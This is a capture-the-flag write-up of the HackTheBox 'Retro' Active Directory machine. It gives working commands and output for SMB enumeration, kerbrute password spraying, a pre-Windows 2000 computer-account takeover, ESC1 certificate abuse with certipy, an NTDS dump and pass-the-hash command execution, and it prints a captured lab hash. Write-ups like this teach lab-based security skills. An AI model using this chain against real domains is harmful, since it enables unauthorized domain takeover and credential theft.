🌌Retro

Initial Enumeration

First let's grab the nmap result :-

─(krrish㉿krrish)-[~/hackthebox/retro]
└─$ nmapAutomator -H 10.129.234.44 -t All

Running all scans on 10.129.234.44

Host is likely running Windows


---------------------Starting Port Scan-----------------------



PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server



---------------------Starting Script Scan-----------------------



PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-12-24 02:44:57Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after:  2025-10-02T10:33:09
|_ssl-date: 2025-12-24T02:46:18+00:00; +1s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after:  2025-10-02T10:33:09
|_ssl-date: 2025-12-24T02:46:18+00:00; +2s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl, Site: Default-First-Site-Name)
|_ssl-date: 2025-12-24T02:46:18+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after:  2025-10-02T10:33:09
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl, Site: Default-First-Site-Name)
|_ssl-date: 2025-12-24T02:46:18+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after:  2025-10-02T10:33:09
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   DNS_Tree_Name: retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-12-24T02:45:38+00:00
|_ssl-date: 2025-12-24T02:46:18+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2025-12-23T02:43:05
|_Not valid after:  2026-06-24T02:43:05
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-time:
|   date: 2025-12-24T02:45:39
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required




---------------------Starting Full Scan------------------------



PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
61420/tcp open  unknown
61433/tcp open  unknown
61634/tcp open  unknown
61642/tcp open  unknown

Let's enumerate the smb more with nxc and we can see that guest login is enabled so we can definitely get more info about the domain

nxc smb 10.129.234.44 -u '.' -p ''
nxc smb 10.129.234.44 -u '.' -p '' --rid-brute
nxc smb 10.129.234.44 -u '.' -p '' --shares

So we can read two shares that is IPC$ & Trainees , so we can look into the Trainees share

From the Trainees share we can see there is an Important.txt file so let's get that

(krrish㉿krrish)-[~/hackthebox/retro]
└─$ smbclient //10.129.234.44/Trainees
Password for [WORKGROUP\krrish]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jul 24 03:28:43 2023
  ..                                DHS        0  Wed Jun 11 19:47:10 2025
  Important.txt                       A      288  Mon Jul 24 03:30:13 2023

                4659711 blocks of size 4096. 1314243 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \> ^C

Getting the user.txt

So this Important.txt tells us that there might be some of the weak passwords around in the domain , so I further gave a thought of using kerbrute to check weak passwords

(krrish㉿krrish)-[~/hackthebox/retro]
└─$ kerbrute passwordspray --dc dc.retro.vl -d retro.vl users.txt --user-as-pass

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/24/25 - Ronnie Flathers @ropnop

2025/12/24 08:24:25 >  Using KDC(s):
2025/12/24 08:24:25 >   dc.retro.vl:88

2025/12/24 08:24:26 >  [+] VALID LOGIN:  [email protected]:trainee
2025/12/24 08:24:26 >  Done! Tested 13 logins (1 successes) in 0.596 seconds

Here we get a hit that trainee user has the same password as its SAM account name

With the user trainee we got access to more shares and we can also further enumerate with the help of bloodhound

Accessing the new share Notes get us user.txt and a ToDo.txt

 smbclient //10.129.234.44/Notes -U Trainee
Password for [WORKGROUP\Trainee]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Apr  9 08:42:49 2025
  ..                                DHS        0  Wed Jun 11 19:47:10 2025
  ToDo.txt                            A      248  Mon Jul 24 03:35:56 2023
  user.txt                            A       32  Wed Apr  9 08:43:01 2025

                4659711 blocks of size 4096. 1307783 blocks available
smb: \> get user.txt
getting file \user.txt of size 32 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (0.6 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> ^C

There we get our user.txt and ToDo.txt

So this ToDo.txt tell us to get rid of ancient banking system and start by pre created computer account that is BANKING$
This older than me line points towards Pre-Windows 2000 computers

https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers

Read more about Pre-Windows 2000 computers from the above link , for the password of the Pre-Windows 2000 computers its the computer name in lowercase without $

So we try the password banking and we get an error message that is STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

This error tells us that the computer account is not able to logon the domain as it doesn't have necessary trust relationship with the domain

https://www.hackingarticles.in/pre2k-active-directory-misconfigurations/

To change the password we can use impacket-changepasswd.py or if you don't want to change password just make a tgt with BANKING$:banking

changepasswd.py retro.vl/BANKING$:[email protected] -newpass Password123@ -p rpc-samr

For root

The rights of BANKING$ is same as trainee for smb shares , so I tried certipy for ADCS exploitation and found it had ESC1

─(krrish㉿krrish)-[~/hackthebox/retro]
└─$ certipy find -u BANKING$ -p Password123@ -target dc.retro.vl -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: dc.retro.vl.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The DNS query name does not exist: DC.retro.vl.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'retro-DC-CA'
[*] Checking web enrollment for CA 'retro-DC-CA' @ 'DC.retro.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Template Created                    : 2023-07-23T21:17:47+00:00
    Template Last Modified              : 2023-07-23T21:18:39+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Full Control Principals         : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Write Property Enroll           : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
    [+] User Enrollable Principals      : RETRO.VL\Domain Computers
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication

So this output tells us that only these 3 have enrollment rights RETRO.VL\Domain Admins , RETRO.VL\Enterprise Admins , RETRO.VL\Domain Computers and we have a domain computer BANKING$

Exploitation steps for ESC1 below :-

First request a certificate :-

certipy req \
    -u 'BANKING$' -p 'Password123@' \
    -dc-ip '10.129.234.44' -target 'DC.retro.vl' \
    -ca 'retro-DC-CA' -template 'RetroClients' \
    -upn '[email protected]' -sid 'S-1-5-21-2983547755-698260136-4283918172-500'

But doing this I get an error CERTSRV_E_KEY_LENGTH

searching more about this i see that we need to give a flag -key-size as by default is 2048 but in this certificate it is 4096

Adding the key flag i get administrator.pfx

certipy req \
    -u 'BANKING$' -p 'Password123@' \
    -dc-ip '10.129.234.44' -target 'DC.retro.vl' \
    -ca 'retro-DC-CA' -template 'RetroClients' \
    -upn '[email protected]' -sid 'S-1-5-21-2983547755-698260136-4283918172-500' -key-size 4096

Authenticate using the obtained certificate , but we will get an error :-

certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.234.44

This error tells us that domain controller that does not support PKINIT authentication that is kerberos authentication with a certificate
But we can still authenticate in ldaps with -ldap-shell and add user trainee in Administrators group

certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.234.44' -ldap-shell
add_user_to_group trainee ADMINISTRATORS

Then I did ntds dump

nxc smb 10.129.234.44 -u trainee -p trainee --ntds

Further we can read the flag using nxc

nxc smb 10.129.15.163 -u administrator -H 252fac7066d93dd009d4fd2cd0368389 -x "type C:\Users\Administrator\Desktop\root.txt"

Pwn3d the machine !!

PreviousHaze NextSweep

Last updated 12 days ago

hashtagInitial Enumeration

hashtagGetting the user.txt

hashtagFor root

hashtagPwn3d the machine !!

Initial Enumeration

Getting the user.txt

For root

Pwn3d the machine !!